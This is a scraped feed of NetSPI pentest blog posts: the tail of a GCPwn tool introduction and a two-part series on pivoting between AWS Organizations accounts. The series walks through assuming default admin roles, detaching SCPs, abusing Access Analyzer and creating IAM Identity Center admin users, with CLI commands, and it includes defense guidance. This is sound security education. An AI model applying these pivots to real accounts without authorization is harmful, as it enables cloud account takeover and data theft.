Unauthenticated modules can be run without any credentials or project set in GCPwn. Only a few exist at this point in time. This mainly encapsulates GCPBucketBrute which is included as “unauth_bucketbrute” and works the same as the standalone tool.  

Process Modules 

Process modules can be run offline and are mainly for ingesting IAM data for analyzing/presenting summaries and vulnerabilities.  

  • “process_iam_bindings”: Generate an IAM summary report of all IAM policy bindings pulled thus far. This includes inherited permissions and custom roles/convenience roles assuming the caller has the permissions to resolve these scenarios. It should be noted that GCPwn will report inherited permissions wherever a user is attached to a resource. So, if User A has role/owner permissions at the organization level, and User A has roles/viewer permissions at the project level, the tool will tell you User A at the project level inherited role/owner from the organization but WON’T necessarily tell you User A inherited role/owner on bucket ABC within the project. But that’s something you can easily infer. 
  • “analyze_vulns”: Based off the results of “process_iam_bindings”, flag any users or service accounts with either single or group permissions or roles that would be deemed dangerous or risky. This is still in progress but currently provides a TXT/CSV with those users/roles with “dangerous” permissions. Also, it will highlight all policies with allUsers or allAuthenticatedUsers members identified. 

Unauthenticated Modules 

  • Unauthenticated modules can be run without any credentials or project set in GCPwn. Only a few exist at this point in time. This mainly encapsulates GCPBucketBrute which is included as “unauth_bucketbrute” and works the same as the standalone tool.

Step 3: Checking Permissions 

Permissions are an important aspect of GCPwn when you begin with credentials in an unknown environment. One of the first questions you usually ask is “what permission do I have/what can I do?” Individual granular permissions are summarized per credential set via the `creds info` command, and roles are summarized through the output of “process_iam_bindings”.  Permissions and roles are mainly populated by:

  1. Module runs: As you run all the modules in the background, GCPwn is noting all the permissions tied to successful API calls. For example, if you are able to list all the buckets when you run “enum_buckets”, than GCPwn will note you have the storage.buckets.list permissions within the current project which will be visible next time you run creds info
  2. testIamPermissions: As discussed earlier, testIamPermissions is an API in GCP that will take in a large list of permissions and return those permissions the caller has over the given resource. Interestingly, the API to return all permissions does not itself have a permission to invoke meaning its fairly accessible as seen by the details for the project-level version:“There are no permissions required for making this API call”. Another nice feature of testIamPermissions is that it allows one to pass in a large set of permissions in one API call making it very effective in permission enumeration allowing up to ~9500 permissions in batches (link to that in “Final Notes”). As stated before, the --iam flag in enumeration modules invokes testIamPermissions at the specified resource level, and GCPwn will save all those testIamPermissions  responses which are visible the next time you run creds info. The TLDR, add –iam to enumeration modules and you don’t have to manually manage it 🙂 
  3. policy bindings: While 1 & 2 above deal with granular permissions, GCP predefined roles are collected when running “enum_policy_bindings”. This module will grab all the policy bindings for resources enumerated thus far which can then be run through “process_iam_bindings” to produce an IAM summary report. This would notably include the “roles” for the users/service accounts as opposed to the granular “permissions” and might be easier to read/parse. 

The command, creds info will probably be run a lot through the course of your pentest. An example is shown below of running creds info before and after executing the enum_buckets module. Note how fresh credentials have no permissions but the successful enum_buckets execution added permissions in the background. 

Before Running Any Modules 

(production-project-1-426001:test_blog)> creds info 

Summary for test_blog: 
Email: newserviceaccount@production-project-1-426001.iam.gserviceaccount.com 
Scopes: 
    - N/A 
Default Project: production-project-1-426001 
All Projects: 
    - [TRUNCATED]

Access Token: N/A 

After Running “enum_buckets –iam”

(production-project-1-426001:test_blog)> creds info 

Summary for test_blog: 
Email: newserviceaccount@production-project-1-426001.iam.gserviceaccount.com 
Scopes: 
    - N/A 
Default Project: production-project-1-426001 
All Projects:
    - production-project-1-426001  
Access Token: N/A 
[******] Permission Summary for test_blog [******] 
- Project Permissions 
  - production-project[TRUNCATED] 
    - storage.buckets.list 
- Storage Actions Allowed Permissions 
  - production-project[TRUNCATED] 
    - storage.buckets.get 
      - gcf-v2-sources-[TRUNCATED] (buckets) 
      - gcf-v2-uploads-[TRUNCATED] (buckets) 
      - test[TRUNCATED] (buckets) 
    - storage.objects.list 
      - gcf-v2-sources-[TRUNCATED] (buckets) 
    - storage.objects.get 
      - gcf-v2-sources-[TRUNCATED] (buckets) 

Final Notes; TLDR 

No doubt the data above + the wiki is a lot to digest. I think most people’s use cases will fall into 2 broad scenarios which I’ve outlined it in the wiki here. Most notably, my favorite scenario is how to brute force ~9500 permissions at the project level with testIamPermissions which I think is pretty cool 😊

The post An Introduction to GCPwn – Part 1 appeared first on NetSPI.

]]>
Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration https://www.netspi.com/blog/technical-blog/cloud-pentesting/pivoting-clouds-aws-organizations-part-2/ Tue, 07 Mar 2023 19:36:18 +0000 https://www.netspi.com/pivoting-clouds-aws-organizations-part-2/ Explore AWS Organizations security implications and see a demonstration of a new Pacu module created for ease of enumeration. Key insights from AWS pentesting.

The post Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration appeared first on NetSPI.

]]>
As mentioned in part one of this two-part blog series on pentesting AWS Organizations, a singular mindset with regard to AWS account takeovers might result in missed opportunities for larger corporate environments. Specifically, those that leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could result in a blast radius that encompasses several, if not all, of the remaining AWS company assets.   

To help mitigate this risk, I pulled from my experience in AWS penetration testing to provide an in-depth explanation of key techniques pentesting teams can use to identify weaknesses in AWS Organizations. 

Read part one to explore organizations, trusted access, and delegated administration and dive into various pivoting techniques after showing the initial “easy win” via created (as opposed to invited) member accounts. 

In this section, we will cover additional and newer AWS Organizations security implications and demonstrate a new Pacu module I created for ease of enumeration. 

Table of Contents

Phishing with AWS Account Management

AWS Account Management is an organization-integrated feature that offers a few simple APIs for updating or retrieving an AWS account’s contact information. This presents an interesting phishing vector.

Assuming we have compromised Account A, enable trusted access for Account Management via the CLI. Note Account Management supports delegated administration as well but we are focusing on trusted access for this portion.

Figure 1: Enable Trusted Access

With trusted access now enabled, update the contact information for Account B changing items like address or full name to assist in a future social engineering attack. Note: I have not attempted social engineering with AWS by calling the AWS help desk or other contacts, nor am I sanctioning that. This would be more from the perspective of trying to trick an engineer or another representative who manages an AWS account at the company to get access.

Figure 2: Update Member Account Contact Information

Delegated Policies – New Features, New Security Risks

AWS Organizations recently announced a new delegated administrator feature on November 27, 2022.  To summarize this release, AWS Organizations now gives you the ability to grant your delegated administrators more API privileges on top of the read-only access they previously gained by default. Only a subset of the Organization APIs dealing primarily with policy manipulation can be allow-listed for delegated administrators, and the allow-list implementation happens in the management account itself.  

In the image below, we used Account A to attach a Service Control Policy (SCP) to Account C that specifically denies S3 actions. A SCP can be thought of as an Identity and Access Management (IAM) policy filter. SCPs can be attached to accounts (like below) or organization accounts (OUs) and propagate downwards in terms of the overall organization hierarchy. They override any IAM privileges at the user/role level for their associated attached accounts. So even if users or roles in Account C have policies normally granting them S3 actions, they would still be blocked from calling S3 actions as the SCP at the organization-level takes precedence.  

Given this setup and the newly released feature, if a management account grants delegated administrators overly permissive rights in terms of policy access/manipulation, delegated administrators could remove restrictive SCPs from their own account or other accounts they control.

Figure 2: SCP Attached to Account C by Account A

To enable the newer feature, navigate to the Settings tab in Account A and click “Delegate” in the “Delegated administrator for AWS Organizations” panel. In the delegation policy’s “Action” key, add organization APIs from the subset provided in the AWS user guide

Note that the actions added include the API calls for attaching and detaching any policy (AttachPolicy/DetachPolicy). Once the actions have been chosen, they are only granted to the member account if the delegation policy lists the member account number as a Principal (Account C in this scenario).

Figure 3: Allowing Policy Management by Delegated Administrators
Figure 4: Create Policy To be Applied to Delegated Administrators

With this setup complete, we can switch to the attacker’s perspective. Assume that we have compromised credentials for Account C and already noted through reconnaissance that the compromised account is a delegated administrator. At this point in our assessment, we want to get access to S3 data but keep getting denied as seen below in Figure 4.

Figure 4: Try to list S3 Buckets as Account C

This makes sense as there is an SCP attached to Account C preventing S3 actions. But wait… with the new AWS Organization feature we as delegated admins might have additional privileges related to policy management that are not immediately evident. So, while still in Account C’s AWS Organization service, try to remove the SCP policy created by Account A from Account C.

Figure 5: View Attached Policies and Try to Detach as Account C

Since the management account delegated us the rights to detach policy, the operation is successful, and we can now call S3 APIs as seen below in Figure 6. 

Figure 6: Observe Successful Detachment as Account C
Figure 7: List S3 Buckets as Account C

Rather than a trial-and-error method, you could also call the “describe-resource-policy” API as Account C and pull down the policy that exists in Account A. Remember that delegated administrators have read-only access by default so this should be possible unless otherwise restricted.

Figure 8: Retrieve Delegation Policy Defined in Account A as Account C

Enumeration Tool for AWS Organizations

A lot of what I covered is based off AWS Organization enumeration. If you compromise an AWS account, you will want to list all organization-related entities to understand the landscape for delegation and the general organization structure (assuming your account is even in an organization).  

To better assist in pentesting AWS Organizations, I added AWS Organizations support to the open-source AWS pentesting tool Pacu. I also wrote an additional Pacu enumeration module for AWS Organizations (organizations__enum). These changes were recently accepted into the Pacu GitHub project and are also available in the traditional pip3 installation procedure detailed in the repository’s README. The two relevant forks are located here:

Note that the GitHub Pacu project contains all APIs discussed thus far, but as you might note in the screenshots below, the pip installation just does not include 1 read-only API (describe-resource-policy) along with 1-2 bug fixes at this time.

I won’t cover how Pacu works as there is plenty of documentation for the tool, but I will run my module from the perspective of a management account and a normal (not a delegated administrator) member account.  

Let’s first run Pacu with respect to Account A. Note that the module collects many associated attributes ranging from a general organization description to delegation data. To see the collected data after running “organizations__enum,” you need to execute “data organizations.” My module also tries to build a visual graph at the end of the enumeration using the account.

Figure 9: Gather Organization Data from Account A
Figure 10: Data Gathered from Account A
Figure 11: View Organization Data & Graph from Account A

At the other extreme, what if the account in question is a member account with no associated delegation? In this case, the module will still pick up the general description of the organization but will not dump all the organization data since your credentials do not have the necessary API permissions. At the very least, this would help tell you at a glance if the account in question is part of an organization. 

Figure 12: Gather Organization Data from Account B
Figure 13: Data Gathered from Account B

Defense

The content discussed above is not any novel zero-days or represents an inherent flaw in AWS itself. The root cause of most of these problems is exposed cleartext credentials and lack of least privilege. The cleartext credentials give an attacker access to the AWS account, with the trusted access and delegated administration allowing for easy pivoting.  

As mentioned in part one, consider a layered defense. Ensure that IAM users/roles adhere to a least privilege methodology, and that organization-integrated features are also monitored and not enabled if not needed. In all cases, protect AWS credentials to avoid access to the AWS environment allowing someone to enumerate the existing resources using a module like the Pacu one above, and subsequently exploit any pivoting vectors. To get a complete picture of the organization’s actions, ensure proper logging is in place as well. 

The following AWS articles provide guidance pertaining to the points discussed above. Or connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.  

Final Thoughts & Conclusion

The architecture and considerable number of enabled/delegated service possibilities in AWS Organizations presents a serious vector for lateral movement within corporate environments. This could easily turn a single AWS account takeover into a multiple account takeover that might cross accepted software deployment boundaries (i.e. pre-production & production). More importantly, a lot of examples given above assume you have compromised a single user or role that allowed for complete control over a given AWS account. In reality, you might find yourself in a situation where permissions are more granular so maybe one compromised user/role has the permissions to enable a service, while another user/role has the permissions to call the enabled service on the organization, and so on.  

We covered a lot in this two-part series on pivoting clouds in AWS Organizations. To summarize the key learnings and assist in your own replication, here’s a procedural checklist to follow: 

  1. Compromise a set of AWS credentials for a user or role in the compromised AWS Account. 
  2. Try to determine if you are the management account, a delegated administrator account, a default member account, or an account not part of an organization. If possible, try to run the Pacu “organizations__enum” module to gather all necessary details in one command.
  3. If you are the management account, go through each member account and try to assume the default role. Consider a wordlist with OrganizationAccountAccessRole included. You can also try to leverage any existing enabled services with IAM Identity Center being the desired service. If necessary, you can also check if there are any delegated administrators you have control over that might assist in pivoting. 
  4. If you are a delegated administrator, check for associated delegated services to exploit similar to enabled services or try to alter existing SCPs to grant yourself or other accounts more permissions. If necessary, you can also check if there are any other delegated administrators you have control over that might assist in pivoting. 

The post Pivoting Clouds in AWS Organizations – Part 2: Examining AWS Security Features and Tools for Enumeration appeared first on NetSPI.

]]>
Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin https://www.netspi.com/blog/technical-blog/cloud-pentesting/pivoting-clouds-aws-organizations-part-1/ Mon, 06 Mar 2023 23:21:07 +0000 https://www.netspi.com/pivoting-clouds-aws-organizations-part-1/ Explore several key points of AWS Organizations theory and learn exploitable opportunities in existing AWS solutions. Key insights from AWS pentesting.

The post Pivoting Clouds in AWS Organizations – Part 1: Leveraging Account Creation, Trusted Access, and Delegated Admin appeared first on NetSPI.

]]>
Amazon Web Services (AWS) is a cloud solution that is used by a large variety of consumers from the single developer to the large corporate hierarchies that make up much of our day-to-day lives. While AWS certainly offers many developer solutions, its roughly 33% cloud share, combined with its vertical customer spread, makes it an attractive target for hackers. This has resulted in numerous presentations/articles regarding privilege escalation within a single AWS account. 

While this is certainly instructional for smaller scale models or informal groupings of AWS accounts, a singular mindset with regard to AWS account takeovers might result in missed opportunities for larger corporate environments that specifically leverage AWS Organizations for account management and centralization. Identifying and exploiting a single misconfiguration or credential leak in the context of AWS Organizations could result in a blast radius that encompasses several, if not all, of the remaining AWS company assets.

This article uses an organization I built from my AWS penetration testing experience to both describe several key points of AWS Organizations theory and demonstrate exploitable opportunities in existing AWS solutions.

In part one of this two-part blog series, we’ll provide an “easy win” scenario and subsequently cover more involved pivoting opportunities with organization-integrated services. In part two, explore today’s AWS security features and tools for enumeration – including a Pacu module I built to assist in data collection.

Table of Contents

AWS Accounts as a Security Boundary

Figure 1: AWS Account Boundaries
Figure 1: AWS Account Boundaries

To differentiate one AWS account from another, AWS assigns each account a unique 12-digit value called an “AWS Account Number” (ex. 000000000001). For notation’s sake (and my own sanity), I will be swapping out 12-digit numbers with letters after initial account introductions below. These AWS accounts present a container or security boundary from an information security standpoint.

Entities created by a service for an individual developer’s AWS account would not be accessible to other AWS accounts. While both Account A and Account B have the S3 service, making a “bucket” in the S3 service in Account A means that bucket entity exists only in Account A, and not Account B.

Of course, you can configure resources to be shared cross-account, but for this generalization we are focusing on the existence and core ownership of the resource. Since AWS Organizations groups a lot of accounts together in one central service, it presents several opportunities to tunnel through these security boundaries and get the associated account’s resources/data.

AWS Organizations Vocabulary

Before we dive into organizations, let’s run through some quick vocabulary. AWS Organizations is an AWS service where customers can create “organizations.” An organization is composed of one or more individual AWS accounts. In Figure 2 below, Account A is the account that created the organization and, as such, is called the management account.

The management account has administrator-like privileges over the entire organization. It can invite other AWS accounts, remove AWS accounts, delete an organization, attach policies, and more. In Figure 2, Account A invited Account B and Account C to join its organization. Accounts B and C are still separate AWS accounts, but by accepting Account A’s invitation their references appear in Account A’s organization entity. Once the invite is accepted, Accounts B and C become member accounts and, by default, have significantly less privileges than the management account. 

A default member account can only view a few pieces of info associated with the management account. It cannot read other organization info, nor can it make changes in the organization. Default member accounts are so isolated that they do not have visibility into what other member accounts exist within the organization, only seeing themselves and the management account number. 

Organizational Units (OUs) can be thought of as customer-created “folders” that you can use for arranging account resources. Root is a special entity that appears in every AWS Organization and can be thought of as functionally equivalent to an OU under which all accounts exist.

A diagram of our sample organization is given in Figure 2. Account ***********0 (Account A) is the account in charge of managing the overall organization, Account ***********9 (Account B) is a member account holding pre-production data, and Account ***********6 (Account C) is a member account holding production data. Account B has a highlighted overly permissive role with a trust access policy set to *. For steps to set up an organization, refer to the AWS user guide.

Figure 2: AWS Organization Lab Layout
Figure 2: AWS Organization Lab Layout

Finally, note that navigating to AWS Organizations in a management account like Account A provides a different UI layout than AWS Organizations in a member account like Account C (Figure 3 versus Figure 4). Noticeably the lefthand navigation bar is different. Because member accounts have significantly less permissions with regard to the organization, navigating to “AWS Accounts” or “Policies” in a default member account returns permission errors as expected. These differences can aid testers in determining if they have access to a management or member account during AWS pentesting.

Figure 3: AWS Management Account Organizations UI
Figure 3: AWS Management Account Organizations UI
Figures 4: AWS Member Accounts Organizations UI
Figure 4: AWS Member Accounts Organizations UI
Figures 4: AWS Member Accounts Organizations UI

Easy Win with Account Creation

In Figure 2, along with most of this 2-part series, we will assume the member accounts in the organization were all pre-existing accounts that were added through individual invites. However, we will take a quick detour from this assumption to look at the AWS account creation feature as this can return an easy early win. This is shown in Figure 5.

Figure 5: AWS Account Creation Pivot
Figure 5: AWS Account Creation Pivot

Account A can choose to create an AWS account when adding it to the organization (as opposed to inviting a pre-existing AWS account like Accounts B and C). When this is done, AWS creates a specific role with a default name of OrganizationAccount AccessRole in the newly created member account. We will denote this newly created member account as Account D.

Figure 6: Account Creation Workflow
Figure 6: Account Creation Workflow

If we were to view the newly created OrganizationAccountAccessRole role in Account D, we would see that the role has AdministratorAccess attached to it and trusts the management account, Account A.

Figure 7: Account D’s OrganizationAccountAccessRole Trust Policy
Figure 7: Account D’s OrganizationAccountAccessRole Trust Policy

Thus, if we compromise credentials for a user/role with the necessary privileges in Account A, we could go through each member account in the AWS Organization and try to assume this default role name. A successful attempt will return credentials as seen below (Figure 8) allowing one to pivot from, in this case, Account A to Account D essentially as an administrator.

Figure 8: Using Account A to AssumeRole OrganizationAccountAccessRole in Account D
Figure 8: Using Account A to AssumeRole OrganizationAccountAccessRole in Account D

Again, this is the “easy win” scenario where you can go from relative control in a management account to administrator control in a member account. However, this might not be as feasible if a default role is not present in member accounts, or you are lacking permissions, or the member account was invited instead of created. In these cases, trusted access and delegated administration would be the next two features to consider.

Trusted Access and Delegated Administration Review

A handful of AWS services have set up specific features or API subsets that integrate with AWS Organizations (ex. IAM Access Analyzer) allowing their functionality to expand from a single AWS account to the entire organization. These organization-integrated features are in what we might consider an “off” state by default.

Figure 9: Trusted Access & Delegated Administration Visualized
Figure 9: Trusted Access & Delegated Administration Visualized

Per AWS, trusted access is when you “enable a compatible AWS service to perform operations across all of the AWS accounts in your organization.” In other words, you can think of trusted access as the “on” switch for these feature integrations. You “trust” the specific integrated feature thereby giving it “trusted access” to the organization data and associated accounts. The exact mechanism by which the feature operations are then carried out might involve service-linked roles created in each relevant account, but we will not examine this too closely for the purpose of this article. Just know trusted access generally grants the feature access to the entire organization.

Figure 9 demonstrates an expected trusted access workflow. Account A “enables” trusted access for one of the predefined organization-supported features which can then access the necessary management/member account resources. From this point onwards, the ability to influence/access/change the associated member accounts is feature specific with Access Analyzer, for example, choosing to access and scan each member account in the organization for trust violations. Enabling a feature like IAM Access Analyzer from the management account means it is an enabled service.

Delegated administration is a status applied to member accounts and gives the targeted member account “read-only access to AWS Organizations service data.” This would allow a member to perform actions like listing AWS organization accounts which was previously blocked per the UI errors in Figure 4. Additionally, the management account is “delegating” permissions to the member account with regards to a specific organization-integrated feature, such that the member account now has the permissions to run the specific feature within their own account on the entire organization. 

Delegated administration is illustrated by the blue lines in the diagram above (Figure 9). Account A would make Account C a delegated administrator specifically for IAM Access Analyzer, and Account C could now run IAM Access analyzer on the entire organization. Making a member account a delegated administrator for certain services like IAM Access Analyzer means Access Analyzer is a delegated service in Account C.

Trusted access and delegated administration are extremely feature-specific concepts and not every organization-integrated feature supports both trusted access and delegated administrators. Learn more about the services you can use with AWS Organizations here.

Leveraging IAM Access Analyzer through Trusted Access

Let’s assume we have compromised credentials for Account A. We could end this attack here but looking in AWS Organizations we would see the additional AWS Accounts B and C listed as member accounts. While we have no credentials or visibility into either member account, we can use our organization permissions from Account A to enable trusted access for a service (or use an already-enabled service). This will allow us to gather data on the member accounts. 

IAM Access Analyzer reviews the roles in an AWS account and tells you if any role trust relationships reach outside a “trust zone.” For example, if you have a role in an AWS account that allows any other AWS account to assume it, that role would get flagged as violating the trust zone since “any AWS account” is a much larger scope than a single AWS account. 

When integrated with AWS Organizations, the Access Analyzer associated trust zone (and as a byproduct, scan range) expands to the entire organization. By giving IAM Access Analyzer trusted access in Account A, we can let the Analyzer scan each member account in the organization and return a report that would include Account B’s vulnerable role.

Before we begin, let’s review each account’s IAM roles. Note we only have access to Account A info, but both role lists are provided here for transparency. Account B has the role with the trusted entity of * that we want to both discover and exploit as Account A.

Figures 10: Account A & Account B Starting IAM Roles Before Exploitation
Figures 10: Account A & Account B Starting IAM Roles Before Exploitation

Figures 10: Account A & Account B Starting IAM Roles Before Exploitation

As the attacker in Account A, navigate to “Services” in AWS Organizations and observe that the IAM Access Analyzer is disabled by default. While we could use the UI controls to enable the organization-integrated feature, we could also make use of the AWS Command Line Interface (CLI) using the leaked credentials.

Next, navigate to the IAM Access Analyzer feature within the IAM service and create an analyzer. Since Access Analyzer is now an enabled service, we can set the “Zone of trust” to the entire organization.

Figures 12: Creating an Access Analyzer

After a few minutes refresh the page and observe that the overly trusting role from Account B is listed as an active finding demonstrating an indirect avenue for collecting Account B data as an Account A entity.

Figure 13: Gathering Vulnerabilities in Account B as Account A
Figure 13: Gathering Vulnerabilities in Account B as Account A

To complete the POC, observe how the attacker in Account A can take the knowledge from the vulnerability scan (specifically the role ARN), and assume the role in Account B thus pivoting within the general organization.

Figure 14: Using Account A to AssumeRole RoleToListS3Stuff in Account B
Figure 14: Using Account A to AssumeRole RoleToListS3Stuff in Account B

While not critical to know for the attacker steps listed above, we can review both accounts again and note that a new service-created role was created and used in each member account per the organization-integrated feature: AWSServiceRoleForAccessAnalyzer.

Figures 15: Account A & Account B IAM Roles After Exploitation
Figures 15: Account A & Account B IAM Roles After Exploitation

Figures 15: Account A & Account B IAM Roles After Exploitation

Leveraging IAM Access Analyzer Through Delegated Administration

To demonstrate delegated administrator exploitation regarding Access Analyzer, we need to enable delegated administration in our current organization environment. To do so from Account A, navigate to Account A’s Access Analyzer feature, choose to add a delegated administrator, and enter Account C’s account number.

Figure 16: Using Account A to Make Account C a Delegated Administrator
Figure 16: Using Account A to Make Account C a Delegated Administrator

Assume that we have compromised credentials for Account C (as opposed to Account A). Also assume we have no starting knowledge regarding the organization. As Account C, we can navigate to the AWS Organizations service, and can conclude that we are probably a member account since the management account number does not match our compromised account number (under the Dashboard tab), and the general UI layout is not that of a management account.

However, unlike a default member account, the “AWS Accounts” tab now returns all AWS accounts in the organization instead of permission denied errors. Remember that one of the first things a delegated administrator gets is read-only rights to the organization. Thus, we can further hypothesize that we are not just a default member account, but a delegated administrator.

Figure 17: Viewing Organization Info as Account C
Figure 17: Viewing Organization Info as Account C

But delegated administrator for what? Since there is no centralized UI component in a member account that lists all the delegated services, we would need to browse to each organization-integrated feature in Account C (IAM Access Analyzer, S3 Storage Lens, etc.) where the UI will hopefully tell us if we are the delegated administrator for that feature.

This is very cumbersome, and we can leverage the CLI in the Appendix of this blog with our delegated administrator read-only rights to speed along the identification process as seen below. First, we call “list-delegated-administrators” to reconfirm our previous hypothesis that Account C is a delegated administrator. We can then list out all the delegated services in relation to ourselves by passing in our own account number to “list-delegated-services-for-account.” In this case, we can see that Access Analyzer is listed (access-analyzer.amazonaws.com) as the delegated service.

Figure 18: Listing Delegated Administrators & Delegated Services as Account C
Figure 18: Listing Delegated Administrators & Delegated Services as Account C

From here, finding the overly trusting role in Account B plays out much the same way as the trusted access example. We create an analyzer in Account C (now having the option to choose the entire organization due to the delegated administrator status), wait for the results, and identify the overly trusting role in Account B. Note that during setup, my first analyzer did not pick up the role immediately so deleting the old analyzer and making a new one seems to be a good debugging step. 

Figure 19: Gathering Vulnerabilities in Account B as Account C
Figure 19: Gathering Vulnerabilities in Account B as Account C

While the previous example started from the perspective of a compromised management account, delegated administrations show how a member account can still leverage organization-integrated features to access/analyze/change member accounts in the overall organization.

IAM Identity Center (Successor to SSO) – Complete Control/Movement over Member Account

IAM Identity Center can be thought of as another “easy win” where one can authenticate to any select member account allowing for full account takeover. While this does support delegated administration, we will just focus on trusted access. Once again, we will assume that you, as an attacker, have compromised credentials for Account A and are now in complete control of the management account.

Navigate to the IAM Identity Center service and choose to “Enable” it. This is the equivalent of enabling trusted access, and listing enabled services now returns IAM Identity Center as “sso.amazonaws.com”.

Figures 20: Enabling the IAM Identity Center Service

Glancing over IAM Identity Center, we can see AWS Organizations is embedded within the service under “AWS accounts”, and that we have the option to create users with associated permission sets. A user entity can be used to sign into the AWS access portal URL, and a permission set says what one can do in terms of IAM privileges. To get into any member account in AWS Organizations, we will create a user with a one-time password (OTP), create a permission set allowing access to all actions/resources, attach the user and permission set to target member account, and subsequently authenticate as the user to get access to the member account.

Figures 21: IAM Identity Center Dashboard
Figures 21: IAM Identity Center Dashboard

Create a user as shown below in Figure 22. Note we will choose the option to “generate a one-time password.” Instead of getting an OTP, we could also choose to send an email to create the user.

Figures 22: Creating a User Workflow
Figures 22: Creating a User Workflow
Figures 22: Creating a User Workflow

At the end of the user creation workflow, we are given an OTP and a Sign-In link. Note this access portal URL is the same URL displayed on the main dashboards page of IAM Identity Center.

Figures 23: Saving One-Time Password for New User
Figure 23: Saving One-Time Password for New User

Next, create a permission set. Think of permission sets as wrappers for IAM policies. We can wrap items like AWS-managed/customer-managed/inline IAM policies in each permission set via the “Custom permission set” workflow. For simplicity’s sake, we will just choose a “Predefined permission set” that already includes the equivalent of the AdministratorAccess policy. While these permission sets encapsulate IAM policies, they are not the same entity and have their own ARN format.

Figures 24: Creating Permission Set Workflow

Now that we have our user and permission set, we can set up a user to log into any member account in our organization displayed in the “AWS accounts” item in the lefthand navigation bar.

Figures 25: Attaching a User/Permission Set to Account Workflow

Now that the user is assigned to the member account, navigate to the sign in URL from earlier and enter the username/OTP combination following the login prompts.

Figures 26: Authenticate as User Workflow
Figures 26: Authenticate as User Workflow
Figures 26: Authenticate as User Workflow

Figures 26: Authenticate as User Workflow

Observe that post-authentication returns a portal with links for accessing the member AWS account via the UI or direct credentials. Clicking on the UI option takes us into the AWS console for Account C. In the UI we can see we are the user with the AdministratorAccess permission set. Thus, we have turned our account takeover of one AWS account into two AWS accounts. We could also have done the exact same vector of attack for Account B allowing for a complete takeover of every AWS account in the organization.

Figures 27: Sign into Member Account as AdministratorAccess User
Figures 27: Sign into Member Account as AdministratorAccess User

Figures 27: Sign into Member Account as AdministratorAccess User

It is worth mentioning that one can configure the service to automatically email OTPs upon user creation via the CLI if that is desired to avoid UI interaction. However, the act of turning on this setting still requires access to the UI making the leveraging UI elements an apparent necessity. After setting up automated email OTPs, you can create the user and permission set via CLI, and immediately try to sign in via the sign-in URL with the username (not the user’s email). An email is then sent that is associated with the username containing the OTP in the email.

Figures 28: Alternative Sign In Technique
Figures 28: Alternative Sign In Technique
Figures 28: Alternative Sign In Technique

Defense

The scenarios above started with the prerequisite that the management or member account credentials had been compromised. Thus, the pivoting techniques listed above do not represent an inherent flaw in AWS itself, but represent potential vectors of attack if certain access is gained through leaked credentials, internal threats, etc. Users can perform several actions to help defend against attacker movement in their organizations including:

  • Adhering to a principle of least privilege at the IAM level. Ideally users in the AWS environment should only have the permissions necessary to do their job. These granular controls mean If an account were compromised, the attacker might not be able to pivot any further into the environment.
  • Adhering to a principle of least privilege at the service level. Ensure that organization-integrated features with trusted access or delegated administration are needed and used. Leaving organization-integrated features enabled when not needed introduces an unnecessary blast radius.
  • Protect credentials, especially those for management accounts and delegated administrators. As seen above, these two positions grant access potentially to an entire organization, so the AWS keys should be protected and maintained.
  • Ensure proper logging infrastructure is set up so Organization actions are properly documented and monitored.

The following AWS articles provide guidance pertaining to the points discussed above. Or connect with NetSPI to learn how an AWS penetration test can help you uncover areas of misconfiguration or weakness in your AWS environment.

Conclusion

This article covers conceptual knowledge and demonstrates actual mechanisms for pivoting within an AWS Organization. Note that the article only covered IAM Access Analyzer and IAM Identity Center, but there are many other organization-integrated features. 

It is highly encouraged that if you are on an assessment without an easy AssumeRole into member accounts, and see an enabled organization feature, to review the specific feature documentation for possible pivoting techniques.

In the part two of this blog series, we will review one more organization-integrated feature, a recent Organization service update, and a tool I have created and pushed to Pacu to assist in enumerating all that was discussed above in one command.

Appendix: CLI Commands

Below is a summary of the important CLI commands that were used or leveraged through the UI. I have also included two examples of CLI workflows for Access Analyzer and Identity Center referenced above. As mentioned, Identity Center involves a mix of UI-only functionality and CLI commands unless the OTP email setting is otherwise configured by default.

# Base Organization Read APIs

aws organizations describe-organization
aws organizations list-roots
aws organizations list-accounts
aws organizations list-aws-service-access-for-organization
aws organizations list-delegated-administrators
aws organizations list-delegated-services-for-account --account-id [account number]
aws organizations list-organizational-units-for-parent –parent-id [OU/root ID]

#  Base Organization Mutate APIs

aws organizations enable-aws-service-access –service-principal [principal designated URL]
aws organizations register-delegated-administrator –account-id [account number] –service-principal [principal designated URL]

# Create Analyzer

└─$ aws accessanalyzer create-analyzer --analyzer-name "TestAnalyzer" --type "ORGANIZATION" --profile Orchestrator --region us-east-1
{
    "arn": "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer"
}

# List Access Analyzer Findings

└─$ aws accessanalyzer list-findings --analyzer-arn "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer" --profile Orchestrator --region us-east-1
{
    "findings": [
        {
            "id": "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c",
            "principal": {
                "AWS": "*"
            },
            "action": [
                "sts:AssumeRole"
            ],
            "resource": "arn:aws:iam:: [REDACTED]6:role/RoleToListS3Stuff",
            "isPublic": true,
            "resourceType": "AWS::IAM::Role",
            "condition": {},
            "createdAt": "2022-12-21T04:29:13.377000+00:00",
            "analyzedAt": "2022-12-21T04:29:13.377000+00:00",
            "updatedAt": "2022-12-21T04:29:13.377000+00:00",
            "status": "ACTIVE",
            "resourceOwnerAccount": "579735764396"
        }
    ]
}

# Get Specific Analyzer Finding

└─$ aws accessanalyzer get-finding --analyzer-arn "arn:aws:access-analyzer:us-east-1: [REDACTED]0:analyzer/TestAnalyzer" --id "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c" --profile Orchestrator --region us-east-1
{
    "finding": {
        "id": "da8a421c-8d7f-47d7-b9aa-58ea3df45a6c",
        "principal": {
            "AWS": "*"
        },
        "action": [
            "sts:AssumeRole"
        ],
        "resource": "arn:aws:iam::[REDACTED]6:role/RoleToListS3Stuff",
        "isPublic": true,
        "resourceType": "AWS::IAM::Role",
        "condition": {},
        "createdAt": "2022-12-21T04:29:13.377000+00:00",
        "analyzedAt": "2022-12-21T04:29:13.377000+00:00",
        "updatedAt": "2022-12-21T04:29:13.377000+00:00",
        "status": "ACTIVE",
        "resourceOwnerAccount": "579735764396"
    }
}

